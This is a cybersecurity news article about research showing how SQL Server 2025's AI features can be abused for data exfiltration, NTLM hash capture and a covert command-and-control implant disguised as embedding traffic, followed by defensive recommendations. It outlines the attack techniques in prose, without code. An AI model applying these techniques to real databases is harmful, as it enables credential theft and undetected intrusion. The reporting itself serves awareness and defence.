SQL Server 2025 AI Features Can Be Abused to Exfiltrate Sensitive Data - cyberpress.org

SQL Server 2025 AI Features Can Be Abused to Exfiltrate Sensitive Data By Lucas Martin June 18, 2026 Categories: Cyber Security News Microsoft SQL Server 2025’s newly introduced AI capabilities, designed to power Retrieval-Augmented Generation (RAG) pipelines, have been demonstrated to be a practical attack surface for data exfiltration and covert command-and-control (C2) communication. SQL Server 2025, released in November 2025, introduced AI-oriented features that researchers have now weaponized for offensive operations. One of the most critical additions is sp_invoke_external_rest_endpoint, refers to a new stored procedure that enables native HTTPS requests to arbitrary external endpoints with payloads up to 100 MB. Another major feature, CREATE EXTERNAL MODEL allows attackers to define external AI embedding models, including attacker-controlled endpoints, directly within the database engine. Data Exfiltration (Source: specterops) This is complemented by AI_GENERATE_EMBEDDINGS, sends string data to a defined model endpoint and returns a JSON vector array, functioning as a covert data transport channel. AI Features Can Be Abused to Exfiltrate Sensitive Data The 100 MB payload ceiling on sp_invoke_external_rest_endpoint is particularly significant. Attackers can serialize entire database tables as JSON and POST them directly to an attacker-controlled HTTPS server, a far stealthier alternative to legacy exfiltration via xp_cmdshell or PowerShell’s Invoke-WebRequest. The researcher demonstrated distinct data exfiltration methods. The first involves dumping credential tables using sp_invoke_external_rest_endpoint with a FOR JSON AUTO payload. The second extends this to filesystem access via OPENROWSET(BULK ...), enabling exfiltration of arbitrary files such as configuration documents or credential stores. The third plant is a database TRIGGER that automatically posts newly inserted credentials to an attacker server upon each table update, creating a persistent, low-noise collection mechanism that requires no repeated operator interaction. Additionally, the CREATE EXTERNAL MODEL feature supports locally hosted ONNX models via UNC paths, which the researcher leveraged to coerce NTLM SMB authentication, thereby enabling hash-capture or relay attacks against domain infrastructure. Microsoft reviewed the report submitted April 20, 2026, but on May 12, 2026, determined the behavior did not meet the bar for security servicing, meaning the primitive remains exploitable. Most notably, the researcher constructed a functional C2 implant entirely in T-SQL and a .NET CLR assembly that routes beacon traffic through AI_GENERATE_EMBEDDINGS. Specterops stated that Commands are encrypted with XOR, encoded as synthetic vector arrays to mimic legitimate embedding model traffic, and decoded server-side. The implant connects back using context connection=true to reuse the in-process SQL session, avoiding the creation of new network connections from the agent process itself. Data Exfiltration (Source: specterops) The resulting traffic is visually indistinguishable from authentic AI model telemetry to an untrained analyst. Security teams should immediately audit all SQL Server database logins and remove unnecessary sysadmin privileges from application service accounts, as over-privileged accounts remain the most common initial access vector. Alerting should be configured for CREATE EXTERNAL MODEL statements, sp_invoke_external_rest_endpoint enablement, and CLR assembly deployment using SQL Audit or Extended Events, since native SQL Server logs do not reliably capture these actions without custom instrumentation. At the network layer, blocking internet-bound HTTPS egress from SQL Server hosts directly at the firewall or proxy level will stop most exfiltration attempts cold, particularly for organizations that host AI models internally. Finally, security operations teams must baseline legitimate embedding model traffic patterns and train analysts to detect anomalies, as AI-normalized egress fundamentally erodes the decades-old rule of treating outbound database web traffic as an automatic red flag. Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google. Share Facebook Twitter Pinterest WhatsApp Lucas Martinhttps://cyberpress.org/ Lucas Martin is an Investigative cybersecurity journalist dedicated to breaking stories on ransomware cartels, data breaches, and state-sponsored espionage. Recent Articles AWS Unveils Continuum to Detect and Remediate Code Vulnerabilities at Scale Cyber Security News June 18, 2026 Hackers Use Malicious LNK File and PowerShell Downloader to Stage In-Memory RAT Cyber Security News June 18, 2026 Hackers Backdoor pam_unix.so and OpenSSH Binaries to Steal Credentials and Bypass Authentication Authentication June 18, 2026 Threat Actors Abuse Remote Monitoring Tools to Bypass Signature-Based Detection AI June 18, 2026 Malvertising Campaign Abuses Claude.ai Shared Chat Feature for Social Engineering Attacks Cyber Security News June 18, 2026 Related Stories Cyber Security News AWS Unveils Continuum to Detect and Remediate Code Vulnerabilities at Scale Lucas Martin - June 18, 2026 Cyber Security News Hackers Use Malicious LNK File and PowerShell Downloader to Stage In-Memory RAT Varshini - June 18, 2026 Authentication Hackers Backdoor pam_unix.so and OpenSSH Binaries to Steal Credentials and Bypass Authentication Varshini - June 18, 2026 AI Threat Actors Abuse Remote Monitoring Tools to Bypass Signature-Based Detection Varshini - June 18, 2026 Cyber Security News Malvertising Campaign Abuses Claude.ai Shared Chat Feature for Social Engineering Attacks Lucas Martin - June 18, 2026 Cyber Security News Hackers Use Fake Cloudflare CAPTCHA and BSOD Lures to Deliver SmartRAT Malware Varshini - June 18, 2026 LEAVE A REPLY Comment: Name:* Email:* Website: